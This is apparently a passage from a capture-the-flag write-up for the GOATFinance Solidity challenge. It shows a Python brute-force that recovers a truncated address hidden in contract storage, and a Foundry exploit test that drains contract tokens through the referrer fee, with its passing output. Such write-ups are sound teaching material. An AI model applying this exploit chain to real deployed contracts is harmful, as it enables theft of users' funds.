// SPDX-License-Identifier: MIT pragma solidity ^0.8.4;
/// @notice Token contract under test. Only the state variables, the constructor
///         and Airdrop() are visible in this excerpt; the contract body continues
///         past it.
contract PrivilegeFinance {
    // --- Token metadata -----------------------------------------------------
    string public name = "Privilege Finance";
    string public symbol = "PF";
    uint256 public decimals = 18;
    uint256 public totalSupply = 200000000000;

    // --- Ledger -------------------------------------------------------------
    mapping(address => uint256) public balances;
    mapping(address => address) public referrers;

    // NOTE(review): no `public` getter, but contract storage can be read by
    // anyone off-chain, so this value is not secret. The literal holds 38 hex
    // digits, one byte short of a 20-byte address.
    string msgsender = '0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E0';

    uint256 public rewmax = 65000000000000000000000;
    uint256 public time = 1677729607;

    // Airdrop() adds Timeinterval to Timeintervallimit on every claim.
    // Timewithdraw / Timewithdrawlimit are consumed outside this excerpt.
    uint256 public Timeinterval = 600;
    uint256 public Timewithdraw = 6000;
    // Both limits start at the deployment block's timestamp.
    uint256 public Timeintervallimit = block.timestamp;
    uint256 public Timewithdrawlimit = block.timestamp;

    // NOTE(review): r / s / v look like the components of an ECDSA signature
    // hard-coded into storage; the code that consumes them is not shown here.
    // Like msgsender they are readable by anyone, so a check that only compares
    // against material stored here would not authenticate the caller. Confirm
    // against the function that uses them.
    bytes32 r = 0xf296e6b417ce70a933383191bea6018cb24fa79d22f7fb3364ee4f54010a472c;
    bytes32 s = 0x62bdb7aed9e2f82b2822ab41eb03e86a9536fcccff5ef6c1fbf1f6415bd872f9;
    uint8 v = 28;

    address public admin = 0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b;

    // Fee parameters; how they are applied, and who may change them, is decided
    // by code outside this excerpt.
    uint256 public burnFees = 2;
    uint256 public ReferrerFees = 8;
    uint256 public transferRate = 10;

    address public BurnAddr = 0x000000000000000000000000000000000000dEaD;
    bool public flag;
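/// @notice Assigns the entire `totalSupply` to the contract's own balance at deployment.
/// @dev The `public` specifier was dropped: constructor visibility is ignored by the
///      compiler from Solidity 0.7.0 on and only produces a warning under ^0.8.4.
constructor() {
    balances[address(this)] = totalSupply;
}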
/// @notice Moves 1000 units from the contract's own balance to the caller.
/// @dev Reverts with "Collection time not reached" when the caller's balance is
///      non-zero or when block.timestamp is still below Timeintervallimit; the
///      same message is used for both failures.
///      NOTE(review): eligibility depends on the caller's *current* balance, so a
///      fresh address, or one whose balance has returned to zero, passes the check
///      again. The cooldown is a single counter shared by all callers and is
///      advanced by Timeinterval per claim rather than reset relative to
///      block.timestamp, so after an idle period several claims can succeed back
///      to back. A per-address claimed flag would be the usual guard.
function Airdrop() public {
    bool emptyBalance = balances[msg.sender] == 0;
    bool windowOpen = block.timestamp >= Timeintervallimit;
    require(emptyBalance && windowOpen, "Collection time not reached");

    // Checked arithmetic (0.8.x): the debit reverts if the contract holds < 1000.
    balances[msg.sender] = balances[msg.sender] + 1000;
    balances[address(this)] = balances[address(this)] - 1000;

    // Push the shared claim window forward by one interval.
    Timeintervallimit = Timeintervallimit + Timeinterval;
}
# `msgsender` is the 38-hex-digit string stored in the contract, i.e. an address
# with its final byte missing. Truncation does not hide the address: EIP-55
# derives the upper/lower casing of every digit from a hash of the whole address,
# so only a correct final byte reproduces the casing of the stored prefix.
# Expects `Web3` and `msgsender` to be defined earlier in the script.
# NOTE(review): web3.py v6 renamed this helper to `Web3.to_checksum_address`.
for last_byte in range(256):
    suffix = "{:02x}".format(last_byte)
    candidate = Web3.toChecksumAddress(msgsender + suffix)
    # Skip candidates whose checksum casing differs from the stored prefix.
    if candidate[:-2] != msgsender:
        continue
    print(candidate)
/// @notice Foundry test that reproduces the challenge solution against a fresh
///         PrivilegeFinance deployment and asserts `isSolved()`.
/// @dev deposit / DynamicRew / transfer / setflag / isSolved are defined outside
///      this excerpt; comments on them describe only what the calls and the logged
///      balances show.
contract goatFinanceTest is Test {
    PrivilegeFinance public goatFi;

    // Deterministic labelled test accounts.
    address owner = makeAddr("owner");
    address hacker = makeAddr("hacker");
    address hacker2 = makeAddr("hacker2");

    /// @notice Deploys the target with `owner` as msg.sender.
    function setUp() public {
        vm.prank(owner);
        goatFi = new PrivilegeFinance();
    }

    /// @notice Runs the full sequence as `hacker`, then sets the flag as `hacker2`.
    function testAttack() public {
        // The 38-digit `msgsender` string from the contract, completed with its last byte.
        address completedMsgsender = 0x71fA690CcCDC285E3Cb6d5291EA935cfdfE4E053;
        // Same value as the contract's public `admin`.
        address adminAddr = 0x2922F8CE662ffbD46e8AE872C1F285cd4a23765b;
        address target = address(goatFi);

        vm.startPrank(hacker);

        // Airdrop credits 1000 units to hacker.
        goatFi.Airdrop();
        console.log("Hacker balance :", goatFi.balances(hacker));
        console.log("Hacker2 balance :", goatFi.balances(hacker2));
        console.log("GOATFinance balance :", goatFi.balances(target));

        // Register hacker2 as hacker's referrer.
        goatFi.deposit(address(0), 1, hacker2);

        // NOTE(review): presumably this call changes the fee parameters after a
        // check against the stored msgsender / signature values; confirm against
        // DynamicRew's body. All of that material is readable from contract
        // storage, which is the weakness this test demonstrates.
        goatFi.DynamicRew(completedMsgsender, 1677729609, 1000000000, 50);

        // Transfer to admin; per the author's note the referrer fee is paid out
        // of the contract's own balance.
        goatFi.transfer(adminAddr, 999);
        console.log("Hacker balance after :", goatFi.balances(hacker));
        console.log("Hacker2 balance after :", goatFi.balances(hacker2));
        console.log("GOATFinance balance after :", goatFi.balances(target));

        vm.stopPrank();

        // The prank stays active for both calls below, so isSolved() is also
        // called as hacker2.
        vm.startPrank(hacker2);
        goatFi.setflag();
        assertTrue(goatFi.isSolved());
    }
}
然后它的输出:
# forge test --match-path test/GOATFinance.t.sol -vv [⠆] Compiling... No files changed, compilation skipped
Running 1 test for test/GOATFinance.t.sol:goatFinanceTest [PASS] testAttack() (gas: 191636) Logs: Hacker balance : 1000 Hacker2 balance : 0 GOATFinance balance : 199999999000 Hacker balance after : 480 Hacker2 balance after : 9980000000 GOATFinance balance after : 190019999001
Test result: ok. 1 passed; 0 failed; finished in 1.51ms